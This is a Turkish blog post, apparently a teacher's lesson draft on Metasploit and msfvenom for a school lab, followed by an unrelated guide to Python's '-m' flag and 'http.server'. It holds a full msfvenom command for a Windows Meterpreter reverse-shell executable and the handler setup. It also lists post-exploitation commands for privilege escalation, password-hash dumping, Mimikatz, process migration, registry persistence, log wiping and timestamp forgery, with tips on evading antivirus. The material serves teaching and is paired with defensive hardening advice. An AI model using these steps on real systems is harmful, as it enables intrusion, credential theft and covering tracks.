Stager (Hazırlayıcı) tarafından hedef sisteme sonradan indirilen büyük ve asıl işi yapan zararlı yüklerdir.

  • Örneğin, hedef sistemde tam yetkili bir Meterpreter oturumu açmak istiyorsunuz. Meterpreter çok büyük ve karmaşık bir koddur; tek seferde sisteme sokmak zordur. Bu yüzden önce ufak bir Stager gönderilir, bağlantı kurulur ve ardından Meterpreter'in kendisi (Stage) parça parça indirilip belleğe yerleşir.

Çok Önemli İpucu: İsimlendirme Farkı (_ vs /)

Metasploit konsolunda show payloads komutunu çalıştırdığınızda binlerce seçenek görürsünüz. Bir yükün "Tekil" (Single) mi yoksa "Aşamalı" (Staged) mı olduğunu ismindeki noktalama işaretinden anlarsınız:

  • Tekil (Single/Inline) Yükler -> Alt Tire (_) ile ayrılır:

    • Örnek: generic/shell_reverse_tcp

    • Anlamı: "shell" ve "reverse" arasında alt tire (_) vardır. Bu, zararlı yükün tek parça olduğu anlamına gelir. Tüm kod hedef sisteme tek seferde, bütün olarak gönderilir.

  • Aşamalı (Staged) Yükler -> Eğik Çizgi (/) ile ayrılır:

    • Örnek: windows/x64/shell/reverse_tcp

    • Anlamı: "shell" ve "reverse" arasında eğik çizgi (/) vardır. Bu, yükün iki aşamalı çalıştığı anlamına gelir. Önce küçük bir bağlantı kodu (Stager) gider, ardından asıl komut satırı arayüzü (Stage) indirilir. Ağırlıklı olarak en sık kullanılan ve en güvenilir yöntem budur.

BÖLÜM 1: Zararlı Yük (Payload) Mimarisi ve İletişim

Sızma testlerinde hedef sisteme gönderilen ve asıl işi yapan kod parçacıklarına Payload (Zararlı Yük) denir. Metasploit mimarisinde payload'lar iletim şekline göre ikiye ayrılır:

  • Tekil (Single / Inline) Yükler: Tüm zararlı kod hedefe tek seferde gönderilir. İsimlerinde alt tire (_) bulunur (Örn: shell_reverse_tcp). Sınırlı alanlarda veya basit komutlarda kullanılır.

  • Aşamalı (Staged) Yükler: İsimlerinde eğik çizgi (/) bulunur (Örn: shell/reverse_tcp). Önce Stager adı verilen çok küçük bir kurye kod hedefe sızıp kapıyı açar, ardından asıl büyük yük (Stage) bu kapıdan içeri alınır. Güvenlik sistemlerini atlatmak için çok daha etkilidir.

Bağlantı Yönleri: Neden Reverse Shell?

  1. Bind Shell (Düz Bağlantı): Hedef bilgisayarda bir port (kapı) açılır ve saldırgan o kapıdan içeri girmeye çalışır. Dezavantajı: Modern güvenlik duvarları (Firewall) dışarıdan gelen (Inbound) bu yabancı istekleri anında engeller.

  2. Reverse Shell (Ters Bağlantı): Saldırgan kendi bilgisayarında bir kapı açıp dinlemeye başlar. Hedef bilgisayar içeriden çıkarak saldırgana bağlanır. Avantajı: Güvenlik duvarları içeriden internete doğru giden (Outbound) trafiğe genelde güvendiği için bağlantıya izin verir.

BÖLÜM 2: Msfvenom ile Özel Silah Üretimi

msfvenom, Metasploit'in bağımsız zararlı yük üreticisidir. Öğrenciler hedefin işletim sistemine ve mimarisine göre özel dosyalar hazırlayabilirler.

Temel Parametreler:

  • -p: Payload türünü seçer.

  • LHOST / LPORT: Dinleme yapılacak IP ve Port (Saldırganın bilgileri).

  • -f: Çıktı formatını belirler (exe, elf, apk, python).

  • -e: Şifreleyici (Encoder) seçer (Örn: x86/shikata_ga_nai).

Laboratuvar Senaryosu Üretim Komutu:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.113.152.236 LPORT=4444 -f exe > lab_test.exe

(Not: Üretilen bu yükün çalışabilmesi için saldırgan makinede exploit/multi/handler modülü ile bir dinleyici başlatılması şarttır.)

Antivirüsleri Atlatma (AV Evasion) Gerçeği

msfvenom ile üretilen standart .exe dosyaları veya bilindik şifreleyiciler (encoders), güncel Windows Defender veya EDR sistemleri tarafından imza analiziyle anında yakalanır. Profesyonel saldırganlar diske dosya yazmak yerine doğrudan belleğe (RAM) enjekte olan Dosyasız (Fileless) zararlılar yazar veya kendi özel Python betiklerini (Custom Scripts) derleyerek sistemleri atlatırlar.

BÖLÜM 3: Hedefe Sızma ve Sömürü Sonrası (Post-Exploitation)

Zararlı yük başarılı olup Meterpreter komut satırına (meterpreter >) ulaşıldığında, sistemin tam kontrolünü ele almak için kritik adımlar izlenir.

1. Keşif ve Hak Yükseltme

  • sysinfo & getuid: Sistem bilgilerini ve mevcut kullanıcı haklarını sorgular.

  • getsystem: Standart kullanıcı haklarından, Windows'un en yüksek yetkisi olan NT AUTHORITY\SYSTEM  seviyesine çıkmaya çalışır. (UAC koruması açık değilse çalışır).

  • hashdump: Sistemdeki tüm kullanıcıların parola özetlerini (SAM veritabanından) çeker. Bu özetler Pardus makinesine alınıp John the Ripper gibi araçlarla kırılabilir veya "Pass-the-Hash" saldırıları için kullanılabilir.

  • load kiwi: Bellekten düz metin (clear-text) parolaları çalan efsanevi Mimikatz aracını aktif eder.

2. Gizlilik ve Kararlılık

  • migrate <PID>: Hedefin uygulamasını kapatması durumunda bağlantının kopmaması için, zararlı yükü sistemin meşru ve sürekli çalışan bir sürecine (Örn: explorer.exe) gizlice göç ettirir (Process Injection).

  • shell: Meterpreter'in kendi ortamından çıkıp, doğrudan kurbanın yerel komut satırına (cmd.exe) geçiş yapar. (Ancak bu işlem Windows loglarında çok gürültü yapar).

3. Kalıcılık ve İz Silme (Anti-Forensics)

  • Kalıcılık Sağlama: run persistence komutları kullanılarak hedefin Kayıt Defterine (Registry) bir arka kapı bırakılır. Hedef bilgisayar yeniden başlasa bile saldırgana otomatik geri bağlanır.

  • clearev: Windows üzerindeki Uygulama, Sistem ve Güvenlik günlüklerini tamamen temizleyerek geçmişi siler.

  • timestomp: Sisteme atılan zararlı dosyanın "Oluşturulma Tarihini" değiştirerek analiz edilmesini zorlaştırır.

BÖLÜM 4: Mavi Takım ve Laboratuvar Savunması

Siber güvenliğin en önemli kuralı: "Saldırmayı bilen, en iyi şekilde savunur." İstemci bilgisayarları bu saldırılardan korumak için sistemleri "Sıkılaştırmak" (Hardening) gerekir.

  1. Masaüstü ve Arayüz Kilitleri: Öğrenci makinelerinde (Örn: Cinnamon masaüstü ortamında) dconf parametreleri kullanılarak ağ ayarlarının değiştirilmesi veya komut satırına yetkisiz erişim engellenmelidir.

  2. En Az Yetki Prensibi: visudo ayarları yapılandırılarak standart kullanıcılara asla "Root/Admin" hakları verilmemelidir.

  3. Fiziksel Güvenlik: udev kuralları ile dışarıdan getirilen USB belleklerin laboratuvar ağına veri aktarması engellenmelidir.

  4. Log Tespiti: Saldırgan clearev komutuyla logları sildiğinde görünmez olduğunu sanır ancak Windows arka planda silinemez bir Event ID 1102 (Denetim günlüğü temizlendi) alarmı üretir. Sistem yöneticileri bu ID'yi gördüğünde saldırıyı fark eder.


1. Metasploit Konsolu (Multi/Handler) Yapılandırmasının Tamamlanması

Metinde "Metasploit Konsolu ile Birlikte Kullanım" başlığı altında yarım kalan adımları teorik olarak netleştirmek, öğrencilerin msfvenom ile ürettikleri yük ile Metasploit arasındaki bağı kurmalarını sağlar. Bir payload oluşturulduktan sonra, saldırgan makinede bu bağlantıyı yakalayacak olan exploit/multi/handler modülünün adımları şu şekildedir:

  1. Modülün Seçilmesi: use exploit/multi/handler

  2. Payload Eşleştirmesi (Kritik Adım): set PAYLOAD <payload_yolu> (Buraya yazılacak payload ismi, msfvenom komutunda -p parametresinden sonra verilen isimle birebir aynı olmalıdır. Örneğin; windows/meterpreter/reverse_tcp)

  3. Dinleyici Bilgilerinin Girilmesi:

    • set LHOST <saldırgan_ip>

    • set LPORT <saldırgan_port>

  4. Çalıştırma: exploit veya daha önce incelediğimiz gibi çoklu yönetim için exploit -j -z

2. Platform Örneklerinin Eğitsel Analizi

Özette yer alan farklı platform örnekleri, öğrencilere zafiyetlerin sadece işletim sistemleriyle sınırlı olmadığını, uygulama ve web katmanlarında da siber güvenliğin ne kadar kritik olduğunu anlatmak için mükemmel birer araçtır:

  • Android APK Örneği: Standart bir uygulamanın (APK) içerisine kod enjekte etme mantığını gösterir. Savunma tarafında öğrencilere, resmi uygulama mağazaları dışındaki kaynaklardan (üçüncü taraf siteler) indirilen dosyaların neden büyük birer tehdit oluşturduğu ve Android cihazlarda "Bilinmeyen Kaynaklar" izninin neden kapalı tutulması gerektiği bu örnek üzerinden aktarılabilir.

  • PHP Payload Örneği: Web uygulamalarındaki "Dosya Yükleme (File Upload)" zafiyetlerinin sonuçlarını anlamak için idealdir. Bir web sitesine filtreleme mekanizmaları aşarak yüklenen bir PHP dosyasının, sunucu üzerinde nasıl tam yetkili bir komut satırı (web shell) açabileceğini mantıksal olarak modeller.

3. Sınırlamalar ve Alternatif Araçlar Bölümünün Genişletilmesi

Karşılaştırma tablosuna ve alternatif araçlar kısmına, günümüz siber güvenlik dünyasındaki şu güncel yaklaşımları eklemek dokümanın vizyonunu genişletecektir:

  • İmza Tabanlı Güvenlik vs. Davranışsal Analiz: Önerilen notlarda belirtildiği gibi, shikata_ga_nai gibi standart kodlayıcılar (encoders) artık modern antivirüslerin statik imza veritabanlarına yakalanmaktadır. Günümüzde bu kısıtlamayı aşmak için öğrenciler Custom Script'ler (Özel Betikler) yazmaya teşvik edilir.

  • Unicorn ve PowerShell Gücü: Harici bir .exe veya .apk dosyası indirtmek yerine, Windows'un kendi meşru aracı olan PowerShell üzerinden bellek içi (fileless) kod çalıştırma mantığı siber savunma derslerinin en önemli konularından biridir.

  • Mavi Takım İçin Tespit Yöntemi: Dokümanın "Sınırlamalar" kısmına defansif bir not eklemek dengeli bir bakış açısı sunar: Msfvenom ile üretilen standart yükler, uç nokta güvenlik sistemleri (EDR) ve ağ izleme araçları (IDS/IPS) tarafından ağ trafiğindeki belirli paternler (örneğin Meterpreter'in varsayılan sertifika yapıları) incelenerek kolayca tespit edilebilir.

Bu ders notu taslağı, öğrencilerin siber saldırı zincirindeki (Cyber Kill Chain) "Zararlı Yük Oluşturma ve Tespit Etme" aşamalarını hem teorik hem de operasyonel olarak anlamaları için oldukça güçlü bir temel sunuyor. 

python -m http.server 80 komutu, komutu çalıştırdığınız klasördeki dosyaları, ağ üzerinde yer alan diğer cihazlarla HTTP protokolü üzerinden anında paylaşmanızı sağlayan yerleşik bir Python web sunucusunu başlatır.

Komutun detaylı kırılımı şu şekildedir:

  • python (veya Linux mimarilerinde genellikle python3): Python yorumlayıcısını çağırır.

  • -m http.server: Python'un standart kütüphanesinde yer alan http.server modülünü bir uygulama betiği (script) olarak doğrudan çalıştırır.

  • 80: Web sunucusunun yayın yapacağı port numarasını ifade eder. 80, internet tarayıcılarının (HTTP) kullandığı varsayılan porttur.

Bu yapıyı laboratuvar ortamında, ana makinenizdeki çalışma dosyalarını, Python betiklerini veya statik web içeriklerini öğrencilerin Pardus istemcilerine hızlıca aktarmak için geçici bir dosya sunucusu olarak kullanabilirsiniz. İstemci makinelerden bir web tarayıcısı açıp sadece sunucunun IP adresini (örneğin http://192.168.1.10) yazmak, o klasördeki dosyalara erişmek için yeterli olacaktır (tarayıcılar varsayılan olarak 80 portunu aradığından URL sonuna port numarasını yazmaya gerek kalmaz).

Önemli Bir Sistem Notu: Linux işletim sistemlerinde 1024'ün altındaki portlar (80 numaralı port dahil) sistem güvenliği gereği "ayrıcalıklı portlar" (privileged ports) olarak kabul edilir. Bu nedenle komutu terminalde standart kullanıcı yetkileriyle çalıştırırsanız Permission denied (Erişim reddedildi) hatası alırsınız. 80 portunda yayın yapabilmek için komutu yönetici (root) ayrıcalıklarıyla çalıştırmanız gerekir:

Bash
sudo python3 -m http.server 80

Eğer sudo yetkisine başvurmak istemiyorsanız veya laboratuvar ağ simülasyonları sırasında arka planda çalışan Django projeleri gibi diğer web servisleriyle port çakışması yaşamak istemiyorsanız, komutu 8000 veya 8080 gibi yüksek bir portla yetkisiz olarak da başlatabilirsiniz (örneğin: python3 -m http.server 8000).

python -m komutundaki -m parametresi, İngilizce "module" (modül) kelimesinin kısaltmasıdır.

Python'a şu talimatı verir: "Belirttiğim kütüphaneyi (modülü) sistem yollarında bul ve onu sanki standart bir Python betiği (script) dosyasıymış gibi doğrudan çalıştır."

Normalde Python ile bir kod çalıştırmak istediğinizde dosyanın tam adını ve uzantısını yazarsınız (örneğin: python script.py). Ancak Python'un standart kütüphanesinde veya sonradan yüklediğiniz paketlerde, doğrudan çalıştırılabilecek özelliklere sahip modüller bulunur. -m parametresi, bu modüllerin bilgisayarınızdaki tam dosya yolunu bilmenize gerek kalmadan onları başlatmanızı sağlar.

Bunu yaptığınızda Python, belirttiğiniz modülün klasörüne gider ve içindeki gizli __main__.py dosyasını tetikler.

En Sık Kullanılan python -m Örnekleri:

1. Sanal Ortam (Virtual Environment) Oluşturma:

Bash
python -m venv sanal_ortamim

Python'un yerleşik venv modülünü çalıştırarak projelerinize özel izole bir kütüphane alanı yaratır.

2. Pip Kullanımı (Bağımlılık Yönetimi):

Bash
python -m pip install django

Normalde sadece pip install django da yazabilirsiniz. Ancak bilgisayarınızda birden fazla Python sürümü varsa (örneğin Python 3.9 ve 3.10), -m kullanmak komutun kesinlikle o an çağırdığınız Python sürümünün içine kurulmasını garanti eder. Bu, ortam çakışmalarını önlemek için en güvenli yöntemdir.

3. Hızlı Web Sunucusu Başlatma (Daha önce incelediğimiz):

Bash
python -m http.server 8000

Bulunduğunuz dizini anında bir web sunucusuna dönüştürür.

4. JSON Dosyalarını Okunabilir Yapma (Pretty-Print): Karmaşık ve tek satıra sıkıştırılmış bir JSON dosyasını terminalde düzenli ve girintili bir şekilde okumak için kullanılır:

Bash
python -m json.tool veriler.json

5. Kod Performansı Ölçme (Timeit): Ufak bir kod parçasının ne kadar sürede çalıştığını test etmek için:

Bash
python -m timeit '"-".join(str(n) for n in range(100))'

Özetle; -m bayrağı, Python ekosistemindeki güçlü araçları, o araçların nerede kurulu olduğunu dert etmeden hızlıca "İsviçre Çakısı" gibi kullanmanızı sağlayan bir kısayoldur.

Yorumlar

Yorum Gönder

Bu blogdaki popüler yayınlar

Android Telefon/Tablet Ekranını Pardus ETAP 23 Yüklü Akıllı Tahtaya Yansıtma

-
Resim
Bu eğitim, öğretmenlerin Android tablet veya telefonlarının ekranını kolayca tahta ekranına yansıtmaları için gereken tüm yöntemler ayrıntılı şekilde anlatılmaktadır. 1. Giriş Android cihazı akıllı tahtaya yansıtmanın amacı: Dersi telefondan yönetmek Mobil uygulamaları sınıfa göstermek YouTube, EBA, PDF, görsel veya kamera görüntüsünü aktarmak Kablosuz sunum yapmak Pardus ETAP 23 üzerinde yansıtma işlemi için en çok tercih edilen yöntemler: Scrcpy (USB + WiFi bağlantılı) — En stabil çözüm Third-party çözümler (TeamViewer Host, DeskScreen, Vysor vb.) Bu makalede en garantili ve ETAP 23’e en uyumlu yöntem olan Scrcpy başta olmak üzere tüm yöntemleri anlatıyoruz. 2. Scrcpy ile Yansıtma Scrcpy, Android cihazınızı yüksek kalite / düşük gecikme ile bilgisayara aktaran açık kaynaklı bir yazılımdır. Pardus ETAP 23 için mükemmel uyumludur. ✔️ 2.1. Kurulum Adım 1 — Gerekli paketleri yükle Terminali açın: sudo apt update sudo apt install scrcpy adb android-to...
Devamı

Pardus Etap 23’de Unutulmuş Etap Yetkili Parolasını Sıfırlama

-
Resim
Bu kısa eğitimde, Pardus sisteminde unutulmuş bir Etap Yetkli parolasının nasıl sıfırlanacağını öğreneceksiniz. Bu, etapadmin kullanıcısı olarak oturum açma ve yönetim görevlerini gerçekleştirme yeteneğinizi yeniden kazanmanıza yardımcı olacaktır. Öncelikle Pardus sisteminizi açın veya yeniden başlatın. Aşağıda gösterildiği gibi bir GRUB menüsüyle karşılaşacaksınız. İlk seçenekte devam edin ve sistem başlatılmadan önce klavyedeki " e " tuşuna basın. . Bu sizi aşağıda gösterilen ekrana yönlendirecektir. Aşağı kaydırın ve /boot/vmlinuz-* bölümünden önce gelen ve UUID 'yi de belirten ' linux ' ile başlayan satırı bulun.   İmleci bu satırın sonuna götürün ve ‘ ro quiet’ bölümünden hemen sonrasına getirin ve init=/bin/bash. parametresini ekleyin Ardından, kök dosya sistemini salt okunur (ro) erişim haklarıyla bağlayarak tek kullanıcı modunda önyüklemeyi etkinleştirmek için Ctrl + x tuşlarına basın. Parolayı sıfırlamak için erişim hakkını salt okunurdan okuma-ya...
Devamı

Pardus Etap 23 Yazıcı Kurulumu

-
Resim
1. CUPS Nedir? CUPS , "Common UNIX Printing System" (Yaygın UNIX Yazdırma Sistemi) kelimelerinin baş harflerinden oluşur.  Temel Görevi: Pardus gibi UNIX tabanlı işletim sistemleri için standart yazdırma sunucusudur. Bilgisayarınızdaki uygulamalardan (LibreOffice, tarayıcı vb.) gelen yazdırma isteklerini alır, bunları yazıcının anlayacağı dile (genellikle PCL veya PostScript) çevirir ve sıraya koyarak yazıcıya gönderir. Geliştirici: İlk olarak Michael Sweet tarafından geliştirildi, daha sonra Apple Inc. tarafından desteklendi ve günümüzde OpenPrinting topluluğu tarafından sürdürülüyor. Ağ Paylaşımı: CUPS'ın en güçlü yanlarından biri, bir yazıcıyı ağdaki diğer bilgisayarlara (Windows, macOS veya başka bir Linux) kolayca paylaştırabilmesidir. Yönetim Arayüzü: En karmaşık ayarları bile yapabilmenizi sağlayan, tarayıcı üzerinden çalışan yerel bir web arayüzüne sahiptir ( http://localhost:631 ). Pardus, Debian tabanlı olduğu için CUPS'ı varsayılan yazdırma sistemi ol...
Devamı